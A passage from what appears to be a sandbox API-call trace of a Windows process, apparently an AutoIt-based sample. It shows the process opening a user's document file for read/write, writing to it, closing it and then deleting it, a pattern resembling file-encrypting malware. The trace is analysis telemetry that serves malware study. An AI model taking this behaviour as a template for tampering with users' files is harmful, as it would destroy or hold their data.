lpMsg=0x87f114) returned 0 [0177.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.632] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0177.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0177.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0177.632] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0177.632] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0177.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0177.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0177.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0177.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0177.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0177.632] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0177.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.632] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0177.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.633] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0177.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.633] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0177.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.633] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0177.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.633] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0177.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.633] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.633] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.633] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.633] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.633] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0177.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.634] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0177.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.634] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0177.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.634] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0177.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.634] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0177.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0177.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0177.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0177.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.634] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0177.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0177.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0177.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0177.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0177.634] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0177.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0177.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdab0 [0177.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bdab0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0177.635] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\b1y6nam2jhwq3mozolb.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0177.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0177.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0177.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0177.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0177.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0177.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0177.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0177.636] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.636] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0177.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0177.636] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0177.636] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0177.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0177.636] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0177.636] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0177.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0177.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0177.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0177.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0177.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0177.636] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0177.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0177.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0177.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0177.636] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0177.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0177.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0177.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd528 [0177.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd528, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0177.638] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.638] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0177.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0177.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0177.638] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0177.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0177.638] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0177.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0177.638] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0177.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0177.662] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0177.662] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0177.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0177.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0177.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0177.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0177.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0177.662] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0177.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0177.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0177.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0177.662] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0177.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0177.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd630 [0177.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd630, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0177.663] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.663] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0177.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0177.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0177.663] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0177.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0177.663] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0177.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0177.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0177.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0177.664] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots", lpFilePart=0x0) returned 0x4f [0177.665] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d7e0f10, ftCreationTime.dwHighDateTime=0x1d5e5c6, ftLastAccessTime.dwLowDateTime=0xf64cede0, ftLastAccessTime.dwHighDateTime=0x1d5e360, ftLastWriteTime.dwLowDateTime=0xf3a0f00, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x17fea, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="B1Y6naM2jHwq3MoZolB.ots", cAlternateFileName="B1Y6NA~1.OTS")) returned 0x90af58 [0177.665] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\b1y6nam2jhwq3mozolb.ots")) returned 1 [0177.667] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d7e0f10, ftCreationTime.dwHighDateTime=0x1d5e5c6, ftLastAccessTime.dwLowDateTime=0xf64cede0, ftLastAccessTime.dwHighDateTime=0x1d5e360, ftLastWriteTime.dwLowDateTime=0xf3a0f00, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x17fea, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="B1Y6naM2jHwq3MoZolB.ots", cAlternateFileName="B1Y6NA~1.OTS")) returned 0 [0177.667] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0177.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0177.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0177.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0177.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0177.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0177.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0177.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0177.668] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0177.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0177.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0177.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0177.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0177.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0177.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0177.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0177.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0177.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0177.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0177.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0177.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0177.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0177.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0177.669] HeapFree 